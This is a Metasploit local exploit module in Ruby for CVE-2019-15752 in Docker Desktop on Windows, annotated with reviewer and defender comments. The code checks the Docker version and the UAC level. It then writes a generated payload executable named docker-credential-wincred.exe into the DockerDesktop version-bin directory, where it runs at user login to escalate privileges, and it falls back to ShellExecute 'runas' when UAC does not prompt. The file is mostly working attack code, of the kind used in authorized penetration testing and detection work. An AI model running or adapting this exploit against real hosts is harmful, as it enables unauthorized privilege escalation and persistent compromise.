GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/docker_credential_wincred.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
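# Local module for CVE-2019-15752 on Windows hosts running Docker Desktop.
#
# The module writes an executable named docker-credential-wincred.exe into
# <PROGRAMDATA>\DockerDesktop\version-bin. Per the module description, that
# file is then run by the Docker user at login.
#
# Notes for reviewers and defenders:
# * The only on-disk artifact created by this file is the executable written
#   in #exploit (declared as ARTIFACTS_ON_DISK). FileDropper is mixed in, but
#   no cleanup is registered in this file, so the artifact stays on disk.
# * #check relies on the `docker -v` CLI version string, not on the state of
#   the version-bin directory.
class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  # Registers module metadata and the PROGRAMDATA option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
        'Description' => %q{
          This exploit leverages a vulnerability in docker desktop
          community editions prior to 2.1.0.1 where an attacker can write
          a payload to a lower-privileged area to be executed
          automatically by the docker user at login.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Morgan Roman', # discovery
          'bwatters-r7', # metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [[ 'Automatic', {} ]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'WfsDelay' => 15
        },
        'DisclosureDate' => '2019-07-05',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'References' => [
          ['CVE', '2019-15752'],
          ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
        ]
      )
    )
    register_options(
      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
    )
  end

  # Runs `docker -v` on the session host and parses the reported version.
  #
  # @return [Rex::Version, nil] the parsed version, or nil when the command
  #   output contains no "version X.Y.Z" string (for example when the docker
  #   CLI is missing or not on PATH)
  def docker_version
    output = cmd_exec('cmd.exe', '/c docker -v')
    vprint_status(output)

    # Without this guard an unmatched output raised NoMethodError on nil,
    # aborting #check instead of letting it report an inconclusive result.
    # The patch component accepts several digits so "18.09.10" is not
    # truncated to "18.09.1".
    match = output.to_s.match(/version (\d+\.\d+\.\d+)/)
    return nil unless match

    # to_i drops leading zeros ("09" -> 9) before the segments are rejoined.
    Rex::Version.new(match[1].split('.').map(&:to_i).join('.'))
  end

  # Decides whether the host looks affected, based on the docker CLI version.
  #
  # NOTE(review): the description names Docker Desktop Community editions
  # prior to 2.1.0.1, while this method compares the `docker -v` version
  # against 18.09.0. The mapping between the two is not shown in this file;
  # confirm that the threshold matches the advisory.
  #
  # @return [CheckCode] Unknown when no version could be read, Appears when
  #   the version is <= 18.09.0, otherwise Safe
  def check
    version = docker_version
    return CheckCode::Unknown if version.nil?
    return CheckCode::Appears if version <= Rex::Version.new('18.09.0')

    CheckCode::Safe
  end

  # Entry point: validates preconditions, branches on the UAC level, then
  # writes the generated executable into the DockerDesktop version-bin
  # directory.
  #
  # The written file is this module's on-disk artifact. An executable named
  # docker-credential-wincred.exe appearing under DockerDesktop\version-bin,
  # written by a non-elevated process, is the observable trace of this step.
  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # make payload
    docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
    fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
    payload_name = 'docker-credential-wincred.exe'
    payload_pathname = "#{docker_path}\\#{payload_name}"
    vprint_status('Making Payload')
    payload = generate_payload_exe

    # upload Payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status('Payload Upload Complete')
    print_status('Waiting for user to attempt to login')
  end

  # Aborts the run unless #check reports Appears and the session is not
  # already elevated.
  #
  # An Unknown result from #check is treated like Safe here: the module stops
  # with Failure::NotVulnerable.
  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    # Stop when the session already runs as an administrator or SYSTEM.
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
  end
end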